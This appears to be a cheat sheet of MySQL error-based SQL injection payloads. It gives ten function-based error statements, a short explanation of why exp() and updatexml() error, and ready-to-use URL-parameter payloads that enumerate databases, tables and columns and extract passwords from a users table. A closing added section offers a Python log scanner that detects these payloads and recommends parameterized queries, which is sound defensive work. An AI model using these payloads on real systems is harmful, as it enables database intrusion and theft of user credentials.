Error-based injection payloads

Common error-based injection payloads

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

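select * from test where id=1 and exp(~(select * from(select user())a));


Each of these error-producing statements works on its own principle:

How exp() errors: exp() is a numeric function that returns e raised to the power of x. An argument greater than 709 raises an error, and applying bitwise negation (~) to the subquery result yields a value greater than 709, so the call errors out.

How updatexml() errors: the second argument of updatexml() must be an XPath-format string. concat() is a string concatenation function, and the string it builds here begins with ~ (0x7e), which is not valid XPath syntax, so the argument breaks the rule. The result of the query inside the parentheses is nevertheless evaluated and shown in the error message, which is what makes error-based injection possible.

Enumerating databases: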

?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) --+

Enumerating tables:

?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema=database()  limit 2,1),1) --+

Enumerating columns:

?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_schema=database() and table_name='test' limit 2,1),1) --+

Extracting data:

?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) --+
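
The ten statements above reduce to three function-call shapes, which makes them straightforward to flag in web access logs. The following is an added example, not part of the original post: a Python scanner run over constructed log lines; the signature names, `scan`, `flag_requests` and `SAMPLE_LOG` are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# MySQL functions this page lists as error-based vectors.
ERROR_FUNCS = ("extractvalue", "updatexml", "geometrycollection", "multipoint",
               "polygon", "multipolygon", "linestring", "multilinestring")
SIGNATURES = {  # hypothetical signature names
    # One of the XML/geometry functions called with a subquery argument.
    "xml_or_geometry_subquery": re.compile(
        r"\b(?:%s)\s*\(.*?\bselect\b" % "|".join(ERROR_FUNCS), re.S),
    # floor(rand(...)) combined with GROUP BY (the duplicate-key error).
    "floor_rand_group_by": re.compile(
        r"\bfloor\s*\(\s*rand\s*\(.*?\bgroup\s+by\b", re.S),
    # exp() applied to a bitwise-negated value (the out-of-range error).
    "exp_bitwise_not": re.compile(r"\bexp\s*\(\s*~"),
}
# Client address and request target from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan(raw_value):
    """Return the sorted names of the signatures matching a URL-encoded value."""
    text = raw_value
    for _ in range(2):  # values may arrive percent-encoded more than once
        text = unquote_plus(text)
    text = text.lower()
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def flag_requests(log_lines):
    """Return [(client_ip, signature_names)] for log lines that match."""
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        hits = scan(m.group(2)) if m else []
        if hits:
            flagged.append((m.group(1), hits))
    return flagged

SAMPLE_LOG = [  # constructed lines; addresses are documentation ranges
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1)%20--+ HTTP/1.1" 200 733',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(user(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 741',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /item.php?id=1%20and%20exp(~(select%20*%20from(select%20user())a)) HTTP/1.1" 200 702',
    '198.51.100.8 - - [01/Jan/2024:10:00:12 +0000] "GET /search?q=polygon+area+formula HTTP/1.1" 200 1290',
]

if __name__ == "__main__":
    print(*flag_requests(SAMPLE_LOG), sep="\n")
```

Matching like this is a detection aid only. The underlying fix is to use parameterized queries and to keep database error text out of responses, since every statement on this page depends on the error message reaching the client.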
